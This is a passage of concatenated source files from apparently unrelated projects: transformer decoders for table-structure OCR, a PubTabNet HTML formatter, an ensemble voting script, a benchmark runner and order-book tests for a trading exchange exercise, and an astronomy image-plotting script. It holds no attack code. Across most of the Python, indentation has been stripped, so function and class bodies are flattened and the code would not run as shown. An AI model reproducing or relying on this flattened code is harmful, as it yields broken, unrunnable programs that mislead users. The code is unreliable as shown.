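    # (B, L), trg_pad_mask is (B, 1, L, 1) and trg_sub_mask is a lower-triangular (L, L) matrix,
    # so the broadcast AND yields a (B, 1, L, L) causal mask that also hides PAD positions.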
def decode(self, input, feature, src_mask, tgt_mask):
# main process of transformer decoder.
x = self.embedding(input)
x = self.positional_encoding(x)
for i, layer in enumerate(self.layers):
x = layer(x, feature, src_mask, tgt_mask)
x = self.norm(x)
return self.fc(x)
def greedy_forward(self, SOS, feature, mask):
input = SOS
output = None
for i in range(self.max_length+1):
_, target_mask = self.make_mask(feature, input)
out = self.decode(input, feature, None, target_mask)
#out = self.decoder(input, feature, None, target_mask)
output = out
prob = F.softmax(out, dim=-1)
_, next_word = torch.max(prob, dim=-1)
input = torch.cat([input, next_word[:, -1].unsqueeze(-1)], dim=1)
return output
def forward_train(self, feat, out_enc, targets_dict, img_metas=None):
# x is token of label
# feat is feature after backbone before pe.
# out_enc is feature after pe.
device = feat.device
if isinstance(targets_dict, dict):
padded_targets = targets_dict['padded_targets'].to(device)
else:
padded_targets = targets_dict.to(device)
src_mask = None
_, tgt_mask = self.make_mask(out_enc, padded_targets[:,:-1])
return self.decode(padded_targets[:, :-1], out_enc, src_mask, tgt_mask)
def forward_test(self, feat, out_enc, img_metas):
src_mask = None
batch_size = out_enc.shape[0]
SOS = torch.zeros(batch_size).long().to(out_enc.device)
SOS[:] = self.SOS
SOS = SOS.unsqueeze(1)
output = self.greedy_forward(SOS, out_enc, src_mask)
return output
def forward(self,
feat,
out_enc,
targets_dict=None,
img_metas=None,
train_mode=True):
self.train_mode = train_mode
if train_mode:
return self.forward_train(feat, out_enc, targets_dict, img_metas)
return self.forward_test(feat, out_enc, img_metas)
@DECODERS.register_module()
class TableMasterDecoder(BaseDecoder):
"""
Split to two transformer header at the last layer.
Cls_layer is used to structure token classification.
Bbox_layer is used to regress bbox coord.
"""
def __init__(self,
N,
decoder,
d_model,
num_classes,
start_idx,
padding_idx,
max_seq_len,
):
super(TableMasterDecoder, self).__init__()
self.layers = clones(DecoderLayer(**decoder), N-1)
self.cls_layer = clones(DecoderLayer(**decoder), 1)
self.bbox_layer = clones(DecoderLayer(**decoder), 1)
self.cls_fc = nn.Linear(d_model, num_classes)
self.bbox_fc = nn.Sequential(
nn.Linear(d_model, 4),
nn.Sigmoid()
)
self.norm = nn.LayerNorm(decoder.size)
self.embedding = Embeddings(d_model=d_model, vocab=num_classes)
self.positional_encoding = PositionalEncoding(d_model=d_model)
self.SOS = start_idx
self.PAD = padding_idx
self.max_length = max_seq_len
def make_mask(self, src, tgt):
"""
Make mask for self attention.
:param src: [b, c, h, l_src]
:param tgt: [b, l_tgt]
:return:
"""
trg_pad_mask = (tgt != self.PAD).unsqueeze(1).unsqueeze(3).byte()
tgt_len = tgt.size(1)
trg_sub_mask = torch.tril(torch.ones((tgt_len, tgt_len), dtype=torch.uint8, device=src.device))
tgt_mask = trg_pad_mask & trg_sub_mask
return None, tgt_mask
def decode(self, input, feature, src_mask, tgt_mask):
# main process of transformer decoder.
x = self.embedding(input)
x = self.positional_encoding(x)
# origin transformer layers
for i, layer in enumerate(self.layers):
x = layer(x, feature, src_mask, tgt_mask)
# cls head
for layer in self.cls_layer:
cls_x = layer(x, feature, src_mask, tgt_mask)
cls_x = self.norm(cls_x)
# bbox head
for layer in self.bbox_layer:
bbox_x = layer(x, feature, src_mask, tgt_mask)
bbox_x = self.norm(bbox_x)
return self.cls_fc(cls_x), self.bbox_fc(bbox_x)
def greedy_forward(self, SOS, feature, mask):
input = SOS
output = None
for i in range(self.max_length+1):
_, target_mask = self.make_mask(feature, input)
out, bbox_output = self.decode(input, feature, None, target_mask)
output = out
prob = F.softmax(out, dim=-1)
_, next_word = torch.max(prob, dim=-1)
input = torch.cat([input, next_word[:, -1].unsqueeze(-1)], dim=1)
return output, bbox_output
def forward_train(self, feat, out_enc, targets_dict, img_metas=None):
# x is token of label
# feat is feature after backbone before pe.
# out_enc is feature after pe.
device = feat.device
if isinstance(targets_dict, dict):
padded_targets = targets_dict['padded_targets'].to(device)
else:
padded_targets = targets_dict.to(device)
src_mask = None
_, tgt_mask = self.make_mask(out_enc, padded_targets[:,:-1])
return self.decode(padded_targets[:, :-1], out_enc, src_mask, tgt_mask)
def forward_test(self, feat, out_enc, img_metas):
src_mask = None
batch_size = out_enc.shape[0]
SOS = torch.zeros(batch_size).long().to(out_enc.device)
SOS[:] = self.SOS
SOS = SOS.unsqueeze(1)
output, bbox_output = self.greedy_forward(SOS, out_enc, src_mask)
return output, bbox_output
def forward(self,
feat,
out_enc,
targets_dict=None,
img_metas=None,
train_mode=True):
self.train_mode = train_mode
if train_mode:
return self.forward_train(feat, out_enc, targets_dict, img_metas)
return self.forward_test(feat, out_enc, img_metas)
@DECODERS.register_module()
class TableMasterConcatDecoder(BaseDecoder):
"""
Split to two transformer header at the last layer.
Cls_layer is used to structure token classification.
Bbox_layer is used to regress bbox coord.
"""
def __init__(self,
N,
decoder,
d_model,
num_classes,
start_idx,
padding_idx,
max_seq_len,
):
super(TableMasterConcatDecoder, self).__init__()
self.layers = clones(DecoderLayer(**decoder), N-1)
self.cls_layer = clones(DecoderLayer(**decoder), 1)
self.bbox_layer = clones(DecoderLayer(**decoder), 1)
self.cls_fc = nn.Linear(d_model, num_classes)
self.bbox_fc = nn.Sequential(
nn.Linear(d_model, 4),
nn.Sigmoid()
)
self.norm = nn.LayerNorm(decoder.size)
self.embedding = Embeddings(d_model=d_model, vocab=num_classes)
self.positional_encoding = PositionalEncoding(d_model=d_model)
self.SOS = start_idx
self.PAD = padding_idx
self.max_length = max_seq_len
def make_mask(self, src, tgt):
"""
Make mask for self attention.
:param src: [b, c, h, l_src]
:param tgt: [b, l_tgt]
:return:
"""
trg_pad_mask = (tgt != self.PAD).unsqueeze(1).unsqueeze(3).byte()
tgt_len = tgt.size(1)
trg_sub_mask = torch.tril(torch.ones((tgt_len, tgt_len), dtype=torch.uint8, device=src.device))
tgt_mask = trg_pad_mask & trg_sub_mask
return None, tgt_mask
def decode(self, input, feature, src_mask, tgt_mask):
# main process of transformer decoder.
x = self.embedding(input)
x = self.positional_encoding(x)
# x_list = []
cls_x_list = []
bbox_x_list = []
# origin transformer layers
for i, layer in enumerate(self.layers):
x = layer(x, feature, src_mask, tgt_mask)
# cls head
for layer in self.cls_layer:
cls_x = layer(x, feature, src_mask, tgt_mask)
cls_x_list.append(cls_x)
cls_x = torch.cat(cls_x_list, dim=-1)
cls_x = self.norm(cls_x)
# bbox head
for layer in self.bbox_layer:
bbox_x = layer(x, feature, src_mask, tgt_mask)
bbox_x_list.append(bbox_x)
bbox_x = torch.cat(bbox_x_list, dim=-1)
bbox_x = self.norm(bbox_x)
return self.cls_fc(cls_x), self.bbox_fc(bbox_x)
def greedy_forward(self, SOS, feature, mask):
input = SOS
output = None
for i in range(self.max_length+1):
_, target_mask = self.make_mask(feature, input)
out, bbox_output = self.decode(input, feature, None, target_mask)
output = out
prob = F.softmax(out, dim=-1)
_, next_word = torch.max(prob, dim=-1)
input = torch.cat([input, next_word[:, -1].unsqueeze(-1)], dim=1)
return output, bbox_output
def forward_train(self, feat, out_enc, targets_dict, img_metas=None):
# x is token of label
# feat is feature after backbone before pe.
# out_enc is feature after pe.
device = feat.device
if isinstance(targets_dict, dict):
padded_targets = targets_dict['padded_targets'].to(device)
else:
padded_targets = targets_dict.to(device)
src_mask = None
_, tgt_mask = self.make_mask(out_enc, padded_targets[:,:-1])
return self.decode(padded_targets[:, :-1], out_enc, src_mask, tgt_mask)
def forward_test(self, feat, out_enc, img_metas):
src_mask = None
batch_size = out_enc.shape[0]
SOS = torch.zeros(batch_size).long().to(out_enc.device)
SOS[:] = self.SOS
SOS = SOS.unsqueeze(1)
output, bbox_output = self.greedy_forward(SOS, out_enc, src_mask)
return output, bbox_output
def forward(self,
feat,
out_enc,
targets_dict=None,
img_metas=None,
train_mode=True):
self.train_mode = train_mode
if train_mode:
return self.forward_train(feat, out_enc, targets_dict, img_metas)
return self.forward_test(feat, out_enc, img_metas)
```
#### File: textrecog/encoders/positional_encoding.py
```python
import math
import torch
import torch.nn.functional as F
from torch import nn
from mmocr.models.builder import ENCODERS
from .base_encoder import BaseEncoder
@ENCODERS.register_module()
class PositionalEncoding(BaseEncoder):
""" Implement the PE function. """
def __init__(self, d_model, dropout=0., max_len=5000):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
# Compute the positional encodings once in log space.
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len).unsqueeze(1).float()
div_term = torch.exp(torch.arange(0, d_model, 2).float() * -math.log(10000.0) / d_model)
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
def forward(self, feat, **kwargs):
if len(feat.shape) > 3:
b, c, h, w = feat.shape
feat = feat.view(b, c, h*w) # flatten 2D feature map
feat = feat.permute((0,2,1))
feat = feat + self.pe[:, :feat.size(1)] # pe 1*5000*512
return self.dropout(feat)
def init_weights(self):
pass
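# Hedged shape sketch (sizes are illustrative): a backbone feature map of shape (B, 512, 6, 40)
# is flattened to (B, 240, 512), pe[:, :240] is added element-wise, and dropout returns a tensor
# of the same (B, 240, 512) shape.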
```
#### File: textrecog/layers/context_block.py
```python
import torch
from torch import nn
class ContextBlock(nn.Module):
def __init__(self,
inplanes,
ratio,
headers,
pooling_type='att',
att_scale=False,
fusion_type='channel_add'):
super(ContextBlock, self).__init__()
assert pooling_type in ['avg', 'att']
assert fusion_type in ['channel_add', 'channel_mul', 'channel_concat']
assert inplanes % headers == 0 and inplanes >= 8 # inplanes must be divided by headers evenly
self.headers = headers
self.inplanes = inplanes
self.ratio = ratio
self.planes = int(inplanes * ratio)
self.pooling_type = pooling_type
self.fusion_type = fusion_type
        self.att_scale = att_scale
self.single_header_inplanes = int(inplanes / headers)
if pooling_type == 'att':
self.conv_mask = nn.Conv2d(self.single_header_inplanes, 1, kernel_size=1)
self.softmax = nn.Softmax(dim=2)
else:
self.avg_pool = nn.AdaptiveAvgPool2d(1)
if fusion_type == 'channel_add':
self.channel_add_conv = nn.Sequential(
nn.Conv2d(self.inplanes, self.planes, kernel_size=1),
nn.LayerNorm([self.planes, 1, 1]),
nn.ReLU(inplace=True),
nn.Conv2d(self.planes, self.inplanes, kernel_size=1))
elif fusion_type == 'channel_concat':
self.channel_concat_conv = nn.Sequential(
nn.Conv2d(self.inplanes, self.planes, kernel_size=1),
nn.LayerNorm([self.planes, 1, 1]),
nn.ReLU(inplace=True),
nn.Conv2d(self.planes, self.inplanes, kernel_size=1))
# for concat
self.cat_conv = nn.Conv2d(2 * self.inplanes, self.inplanes, kernel_size=1)
elif fusion_type == 'channel_mul':
self.channel_mul_conv = nn.Sequential(
nn.Conv2d(self.inplanes, self.planes, kernel_size=1),
nn.LayerNorm([self.planes, 1, 1]),
nn.ReLU(inplace=True),
nn.Conv2d(self.planes, self.inplanes, kernel_size=1))
def spatial_pool(self, x):
batch, channel, height, width = x.size()
if self.pooling_type == 'att':
# [N*headers, C', H , W] C = headers * C'
x = x.view(batch * self.headers, self.single_header_inplanes, height, width)
input_x = x
# [N*headers, C', H * W] C = headers * C'
# input_x = input_x.view(batch, channel, height * width)
input_x = input_x.view(batch * self.headers, self.single_header_inplanes, height * width)
# [N*headers, 1, C', H * W]
input_x = input_x.unsqueeze(1)
# [N*headers, 1, H, W]
context_mask = self.conv_mask(x)
# [N*headers, 1, H * W]
context_mask = context_mask.view(batch * self.headers, 1, height * width)
# scale variance
if self.att_scale and self.headers > 1:
                context_mask = context_mask / (self.single_header_inplanes ** 0.5)  # plain float sqrt; torch.sqrt expects a tensor
# [N*headers, 1, H * W]
context_mask = self.softmax(context_mask)
# [N*headers, 1, H * W, 1]
context_mask = context_mask.unsqueeze(-1)
# [N*headers, 1, C', 1] = [N*headers, 1, C', H * W] * [N*headers, 1, H * W, 1]
context = torch.matmul(input_x, context_mask)
# [N, headers * C', 1, 1]
context = context.view(batch, self.headers * self.single_header_inplanes, 1, 1)
else:
# [N, C, 1, 1]
context = self.avg_pool(x)
return context
def forward(self, x):
# [N, C, 1, 1]
context = self.spatial_pool(x)
out = x
if self.fusion_type == 'channel_mul':
# [N, C, 1, 1]
channel_mul_term = torch.sigmoid(self.channel_mul_conv(context))
out = out * channel_mul_term
elif self.fusion_type == 'channel_add':
# [N, C, 1, 1]
channel_add_term = self.channel_add_conv(context)
out = out + channel_add_term
else:
# [N, C, 1, 1]
channel_concat_term = self.channel_concat_conv(context)
# use concat
_, C1, _, _ = channel_concat_term.shape
N, C2, H, W = out.shape
out = torch.cat([out, channel_concat_term.expand(-1, -1, H, W)], dim=1)
out = self.cat_conv(out)
out = nn.functional.layer_norm(out, [self.inplanes, H, W])
out = nn.functional.relu(out)
return out
```
#### File: textrecog/recognizer/master.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmdet.models.builder import DETECTORS, build_backbone, build_loss
from mmocr.models.builder import (build_convertor, build_decoder,
build_encoder, build_preprocessor)
from .encode_decode_recognizer import EncodeDecodeRecognizer
@DETECTORS.register_module()
class MASTER(EncodeDecodeRecognizer):
# need to inherit BaseRecognizer or EncodeDecodeRecognizer in mmocr
def __init__(self,
preprocessor=None,
backbone=None,
encoder=None,
decoder=None,
loss=None,
label_convertor=None,
train_cfg=None,
test_cfg=None,
max_seq_len=40,
pretrained=None):
super(MASTER, self).__init__(preprocessor,
backbone,
encoder,
decoder,
loss,
label_convertor,
train_cfg,
test_cfg,
max_seq_len,
pretrained)
def init_weights(self, pretrained=None):
for p in self.parameters():
if p.dim()>1:
nn.init.xavier_uniform_(p)
def forward_train(self, img, img_metas):
"""
Args:
img (tensor): Input images of shape (N, C, H, W).
Typically these should be mean centered and std scaled.
img_metas (list[dict]): A list of image info dict where each dict
contains: 'img_shape', 'filename', and may also contain
'ori_shape', and 'img_norm_cfg'.
For details on the values of these keys see
:class:`mmdet.datasets.pipelines.Collect`.
Returns:
dict[str, tensor]: A dictionary of loss components.
"""
feat = self.extract_feat(img)
feat = feat[-1]
gt_labels = [img_meta['text'] for img_meta in img_metas]
targets_dict = self.label_convertor.str2tensor(gt_labels)
out_enc = None
if self.encoder is not None:
out_enc = self.encoder(feat)
out_dec = self.decoder(
feat, out_enc, targets_dict, img_metas, train_mode=True)
loss_inputs = (
out_dec,
targets_dict,
img_metas,
)
losses = self.loss(*loss_inputs)
return losses
def simple_test(self, img, img_metas, **kwargs):
"""Test function with test time augmentation.
Args:
imgs (torch.Tensor): Image input tensor.
img_metas (list[dict]): List of image information.
Returns:
list[str]: Text label result of each image.
"""
feat = self.extract_feat(img)
feat = feat[-1]
out_enc = None
if self.encoder is not None:
out_enc = self.encoder(feat)
out_dec = self.decoder(
feat, out_enc, None, img_metas, train_mode=False)
label_indexes, label_scores = self.label_convertor.tensor2idx(
out_dec, img_metas)
label_strings = self.label_convertor.idx2str(label_indexes)
# flatten batch results
results = []
for string, score in zip(label_strings, label_scores):
results.append(dict(text=string, score=score))
return results
```
#### File: PubTabNet-master/examples/utils.py
```python
import re
from bs4 import BeautifulSoup as bs
def format_html(img):
''' Formats HTML code from tokenized annotation of img
'''
html_string = '''<html>
<head>
<meta charset="UTF-8">
<style>
table, th, td {
border: 1px solid black;
font-size: 10px;
}
</style>
</head>
<body>
<table frame="hsides" rules="groups" width="100%%">
%s
</table>
</body>
</html>''' % ''.join(img['html']['structure']['tokens'])
cell_nodes = list(re.finditer(r'(<td[^<>]*>)(</td>)', html_string))
assert len(cell_nodes) == len(img['html']['cells']), 'Number of cells defined in tags does not match the length of cells'
cells = [''.join(c['tokens']) for c in img['html']['cells']]
offset = 0
for n, cell in zip(cell_nodes, cells):
html_string = html_string[:n.end(1) + offset] + cell + html_string[n.start(2) + offset:]
offset += len(cell)
# prettify the html
soup = bs(html_string)
html_string = soup.prettify()
return html_string
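# Hedged usage sketch (the dict layout follows the PubTabNet annotation format assumed above):
# img = {'html': {'structure': {'tokens': ['<tr>', '<td>', '</td>', '</tr>']},
#                 'cells': [{'tokens': ['cell text']}]}}
# print(format_html(img))   # prettified HTML table with "cell text" inside its single <td>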
if __name__ == '__main__':
import json
import sys
f = sys.argv[1]
with open(f, 'r') as fp:
annotations = json.load(fp)
for img in annotations['images']:
html_string = format_html(img)
print(html_string)
```
#### File: TableMASTER-mmocr/table_recognition/vote.py
```python
import os
import glob
import pickle
def merge_folder_results(result_files):
"""
merge structure results of once inference folder into a dict.
:param result_files: structure results file path of once structure inference.
:return:
"""
new_data = dict()
for result_file in result_files:
with open(result_file, 'rb') as f:
data = pickle.load(f)
new_data.update(data)
return new_data
def vote_structure_by_folder(folders):
"""
vote structure inference results. The first result must from the best single model.
:param folder: folders is a list of structure inference result.
:return:
"""
# get vote data dictionary
vote_data_dict = dict()
for folder in folders:
search_folder = os.path.join(folder, 'structure_master_results_*.pkl')
result_files = glob.glob(search_folder)
results = merge_folder_results(result_files)
for filename in results.keys():
if filename not in vote_data_dict.keys():
vote_data_dict.setdefault(filename, [results[filename]])
else:
vote_data_dict[filename].append(results[filename])
# vote, support 3 result vote.
final_result_dict = dict()
for filename in vote_data_dict.keys():
vote_data = vote_data_dict[filename]
vote_result_dict = dict()
# vote details
if vote_data[1]['text'] == vote_data[2]['text']:
vote_result_dict['text'] = vote_data[1]['text']
vote_result_dict['score'] = vote_data[1]['score']
vote_result_dict['bbox'] = vote_data[1]['bbox']
print(filename) # print the filename, whose voted result not from the best accuracy model.
else:
vote_result_dict['text'] = vote_data[0]['text']
vote_result_dict['score'] = vote_data[0]['score']
vote_result_dict['bbox'] = vote_data[0]['bbox']
final_result_dict[filename] = vote_result_dict
return final_result_dict
if __name__ == "__main__":
folders = [
'/result/structure_master_single_model_inference_result1/',
'/result/structure_master_single_model_inference_result2/',
'/result/structure_master_single_model_inference_result3/',
]
final_result_dict = vote_structure_by_folder(folders)
save_path = 'structure_master_results.pkl'
with open(save_path, 'wb') as f:
pickle.dump(final_result_dict, f)
```
|
{
"source": "jessmorecroft/Exchange",
"score": 2
}
|
#### File: jessmorecroft/Exchange/benchmark.py
```python
import sys
import os
import timeit
import gzip
import shutil
import glob
import datetime
import statistics
# The Azure pipeline for each solution is required to publish a flattened artifact named like the following examples:
#
# Part 1/cpp_solution -> part_1_cpp_solution
# Part 1/csharp_solution -> part_1_csharp_solution
#
# The Benchmark pipelines will extract these artifacts and then run this script.
#
# The artifact directory must contain a script or executable called 'runner' that will execute the program. This
# just simplifies this script so it does not need to know the vagaries of running executables for different languages.
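#
# For illustration only (this exact layout is an assumption, not taken from the pipeline
# definitions), an extracted artifact might look like:
#   part_1_cpp_solution/
#       runner      <- small wrapper script that simply execs the built binary
#       exchange    <- the built executable
# This script never runs the binary directly; it always invokes './runner < input > output'.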
def usage():
print(sys.argv[0] + ' <directory> <prefix> <iterations> input...')
if len(sys.argv) < 4:
usage()
sys.exit(1)
directory = sys.argv[1]
prefix = sys.argv[2]
iterations = int(sys.argv[3])
input_files = sys.argv[4:]
if iterations <= 0 or len(input_files) == 0:
usage()
sys.exit(1)
def line_count(file):
with open(file) as f:
for i, _ in enumerate(f):
pass
return i + 1
def uncompress(input):
if not input.endswith('.gz'):
return input
output = input[:-3]
with gzip.open(input, 'rb') as f_in:
with open(output, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
return output
results = {}
for input in input_files:
input = uncompress(input)
order_count = line_count(input)
results[order_count] = []
for solution in os.listdir(directory):
if not os.path.isdir(os.path.join(directory, solution)):
continue
if not solution.startswith(prefix):
continue
runner = os.path.relpath(os.path.join(directory, solution, 'runner'))
if not os.path.exists(runner):
continue
input_file = os.path.realpath(input)
working_directory = os.path.realpath(os.path.join(directory, solution))
output_file = os.path.realpath(os.path.join(working_directory, 'trades'))
for solution_file in glob.glob(os.path.join(working_directory, '*')):
os.chmod(solution_file, 0o755)
command = "subprocess.run(['./runner < {} > {}'], shell=True, cwd='{}')".format(input_file, output_file, working_directory)
try:
# TODO - support an exclusion file so we don't hard code this.
if solution.find('python') >= 0 or solution.find('swift') >= 0:
# These solutions are too slow for the big file and relatively slow on
# the small file. Because the comparison with other solutions isn't as important
# we don't care so much about the validity of the results.
if order_count > 100000:
continue
actual_iterations = 1
else:
actual_iterations = iterations
result = timeit.repeat(stmt = command, setup = "import subprocess", number = 1, repeat = actual_iterations)
if not os.path.exists(output_file):
continue
results[order_count].append((solution, statistics.median(result), line_count(output_file)))
except Exception as ex:
print(str(ex))
continue
def human_format(num):
magnitude = 0
while abs(num) >= 1000:
magnitude += 1
num /= 1000
return '{}{}'.format(int(num), ['', 'K', 'M', 'G', 'T', 'P'][magnitude])
languages = {
"cpp" : "C++",
"csharp" : "C#",
"fsharp" : "F#",
"rust" : "Rust",
"go" : "Go",
"swift" : "Swift",
"java" : "Java",
"python" : "Python",
"cython" : "Cython",
"c" : "C"
}
def language(solution):
name = solution.split('_')[2]
try:
return languages[name]
except KeyError:
return name
for order_count, solutions in results.items():
solutions.sort(key=lambda solution: solution[1])
print('||{} orders|trades|'.format(human_format(order_count)))
print('-|:-:|:-:|')
for solution in solutions:
time = str(datetime.timedelta(seconds=solution[1]))
print('|{}|{}|{}|'.format(language(solution[0]), time, solution[2]))
print("\n")
```
#### File: part_2/python_solution/test_orderbook.py
```python
import unittest
import Exchange
class TestOrderBook(unittest.TestCase):
def test_create(self):
o = Exchange.OrderBook("AUDUSD")
self.assertEqual(o.instrument, "AUDUSD")
self.assertEqual(o.buys, [])
self.assertEqual(o.sells, [])
def test_append(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "100", "1.47")
self.assertEqual(len(b.buys), 1)
self.assertEqual(len(b.sells), 0)
self.assertEqual(b.buys[0].qty, 100)
def test_append_sell(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "-100", "1.47")
self.assertEqual(len(b.buys), 0)
self.assertEqual(len(b.sells), 1)
self.assertEqual(b.sells[0].qty, 100)
class TestSorting(unittest.TestCase):
def test_append_sort_buy_inorder(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "100", "1.47")
b.append("A", "200", "1.47")
self.assertEqual(len(b.buys), 2)
self.assertEqual(len(b.sells), 0)
# remember, first element is top of book
self.assertEqual(b.buys[0].qty, 100)
self.assertEqual(b.buys[1].qty, 200)
def test_append_sort_sell_inorder(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "-100", "1.47")
b.append("A", "-200", "1.47")
self.assertEqual(len(b.sells), 2)
self.assertEqual(len(b.buys), 0)
# remember, first element is top of book
self.assertEqual(b.sells[0].qty, 100)
self.assertEqual(b.sells[1].qty, 200)
def test_append_sort_buy_rev(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "200", "1.48")
b.append("A", "100", "1.47")
self.assertEqual(len(b.buys), 2)
self.assertEqual(len(b.sells), 0)
# for buys, first element has highest price
self.assertEqual(b.buys[0].qty, 200)
self.assertEqual(b.buys[1].qty, 100)
def test_append_sort_sell_rev(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "-200", "1.48")
b.append("A", "-100", "1.47")
self.assertEqual(len(b.sells), 2)
self.assertEqual(len(b.buys), 0)
# for sells, first element has lowest price
self.assertEqual(b.sells[0].qty, 100)
self.assertEqual(b.sells[1].qty, 200)
class TestMatch(unittest.TestCase):
def test_not_overlapped(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "200", "1.46")
b.append("A", "-100", "1.47")
self.assertEqual(b.match(), [])
def test_same_size(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "100", "1.48")
b.append("A", "-100", "1.47")
# Overlap, price is the first entry in the book
tlist = b.match()
self.assertEqual(len(tlist), 1)
self.assertEqual(str(tlist[0]), "A:A:AUDUSD:100:1.48")
# check that the books have been updated
self.assertEqual(len(b.sells), 0)
self.assertEqual(len(b.buys), 0)
def test_buy_bigger(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "200", "1.48")
b.append("A", "-100", "1.47")
# Overlap, price is the first entry in the book
tlist = b.match()
self.assertEqual(len(tlist), 1)
self.assertEqual(str(tlist[0]), "A:A:AUDUSD:100:1.48")
# check that the books have been updated
self.assertEqual(len(b.sells), 0)
self.assertEqual(len(b.buys), 1)
# buy should have 100 shs left
self.assertEqual(b.buys[0].qty, 100)
def test_sell_bigger(self):
b = Exchange.OrderBook("AUDUSD")
b.append("A", "100", "1.48")
b.append("A", "-200", "1.47")
# Overlap, price is the first entry in the book
tlist = b.match()
self.assertEqual(len(tlist), 1)
self.assertEqual(str(tlist[0]), "A:A:AUDUSD:100:1.48")
# check that the books have been updated
self.assertEqual(len(b.sells), 1)
self.assertEqual(len(b.buys), 0)
# sell should have 100 shs left
self.assertEqual(b.sells[0].qty, 100)
if __name__ == "__main__":
unittest.main()
```
#### File: part_2/python_solution/test_trade.py
```python
import unittest
import Exchange
class TestTrade(unittest.TestCase):
def test_create(self):
t = Exchange.Trade('Buyer', 'Seller', 'BHP', 100, 2.34)
self.assertEqual(t.buyer, 'Buyer')
self.assertEqual(t.seller, 'Seller')
self.assertEqual(t.instrument, 'BHP')
self.assertEqual(t.qty,100)
self.assertEqual(t.price, 2.34)
def test_str(self):
t = Exchange.Trade('Buyer', 'Seller', 'BHP', 100, 2.34)
self.assertEqual(str(t), "Buyer:Seller:BHP:100:2.34")
if __name__ == "__main__":
unittest.main()
```
|
{
"source": "jessmos/MEDIS",
"score": 2
}
|
#### File: MEDIS/Annulus Pipeline/Graphing Pipeline.py
```python
import os
import matplotlib.pyplot as plt
import numpy as np
import tables as pt
from matplotlib.colors import LogNorm, SymLogNorm
from skimage.util import img_as_ubyte
from skimage.util import invert
from skimage import color
from skimage import io
from numpy import inf
#import optics as opx
#c=os.chdir('C:/Users/jessm/PycharmProjects')
#print(c)
import sys
sys.path.append("C:/Users/jessm/OneDrive/Documents/Coding/proper_v3.2.3_python_3.x")
def open_obs_sequence_hdf5(obs_seq_file='hyper.h5'):
"""opens existing obs sequence .h5 file and returns it"""
# hdf5_path = "my_data.hdf5"
read_hdf5_file = pt.open_file(obs_seq_file, mode='r')
# Here we slice [:] all the data back into memory, then operate on it
obs_sequence = read_hdf5_file.root.data[:]
# hdf5_clusters = read_hdf5_file.root.clusters[:]
read_hdf5_file.close()
return obs_sequence
def cpx_to_intensity(data_in):
"""
converts complex data to units of intensity
WARNING: if you sum the data sequence over objects or wavelengths with a simple np.sum(), it must be done AFTER
converting to intensity, else the results are invalid
"""
return np.abs(data_in)**2
def crop_center(img):
y,x = img.shape
if img.shape[0]<img.shape[1]:
cropx=img.shape[0]
startx = x//2-(cropx//2)
return img[:,startx:startx+cropx]
elif img.shape[1]<img.shape[0]:
cropy=img.shape[1]
starty = y//2-(cropy//2)
return img[starty:starty+cropy,:]
else :
print("it is already a cube")
return img
"""you have to put in the path to your own file"""
rebinned = open_obs_sequence_hdf5('C:/Users/jessm/.spyder-py3/MEDIS_spy/rebinned_cube5e8.h5')
#C:\Users\jessm\.spyder-py3\MEDIS_spy\
savename='np_rebinned5e8'
"""looking at fields"""
fields0 = open_obs_sequence_hdf5('C:/Users/jessm/.spyder-py3/MEDIS_spy/fields5e8.h5')
fields=fields0.astype(float)
#h5 file=complex image
#'timesteps', 'save planes', 'wavelengths', 'astronomical bodies', 'x', 'y'
print("Fields shape", fields.shape)
focal_sun=rebinned[0,-1,:,:]
focal_planet=fields[0,-1,:,:,:,:]
print("focal planet shape", focal_planet.shape)
print("rebinned cube shape", rebinned.shape)
#FOR REBINNED CUBE
#-no object or plane axis
#-rectangle
"""plotting fields"""
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111)
#cax = ax.imshow(np.sum(focal_planet, axis=(0,1)), vmin=1e-9, vmax=1e-4, origin='lower', norm=SymLogNorm(1e-10))
cax = ax.imshow(np.sum(cpx_to_intensity(focal_planet), axis=(0,1)), origin='lower', norm=LogNorm(vmin=1e-7, vmax=1e-3), cmap = "YlGnBu_r")
plt.title("Star and Planet Broadband - Unresolved Ringing")
plt.xlabel("X Coordinates")
plt.ylabel("Y Coordinates")
cb = plt.colorbar(cax)
plt.show()
"""cropping rebinned cube into cube"""
#print(crop_rebinned.shape)
rebinsum= np.sum(rebinned, axis=(0,1))
print("this is before cropping \n rebinned sum =", rebinsum.shape)
rebinsum=crop_center(rebinsum)
print("this is after cropping \n rebinned sum =", rebinsum.shape)
"""plotting lognorm rebinned cube"""
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111)
#cax=ax.imshow(np.sum(rebinned))
cax = ax.imshow(rebinsum, origin='lower', norm=SymLogNorm(1e-10,vmin=1e-1, base=np.e), cmap = "YlGnBu_r")
#SymLogNorm values were hand selected
#SymLogNorm only uses positive values, but that's ok because we only have positive values
plt.title("Rebinned Cube")
plt.xlabel("X Coordinates")
plt.ylabel("Y Coordinates")
cb = plt.colorbar(cax)
plt.show()
"""log normalizing from 0 to 1"""
x=np.log(rebinsum)
print("max", np.amax(x), "min", np.amin(x))
x[x == -inf] = 0
normalized = (x-np.amin(x))/(np.amax(x)-np.amin(x))
imguint= np.array(normalized*65535, dtype=np.uint16)
#img=img/10
img= np.array(normalized, dtype=np.float32)
#print(img)
print("log normalized max=", np.amax(img), "log normalized min=", np.amin(img))
"""The log normalized rebinned cube image is saved in uint16 form (inferior) for use in the
Refined Otsu Pipeline, and also saved in float32 form (superior) for use in
the Intensity file."""
np.save(savename+'uint', imguint)
np.save(savename, img)
"""plotting"""
fig, axes = plt.subplots(1, 2, figsize=(8, 5), sharex=True, sharey=True)
ax = axes.ravel()
ary=ax[0].imshow(imguint, origin='lower', cmap=plt.cm.gray)
ax[0].set_title('Log Normalized in uint16')
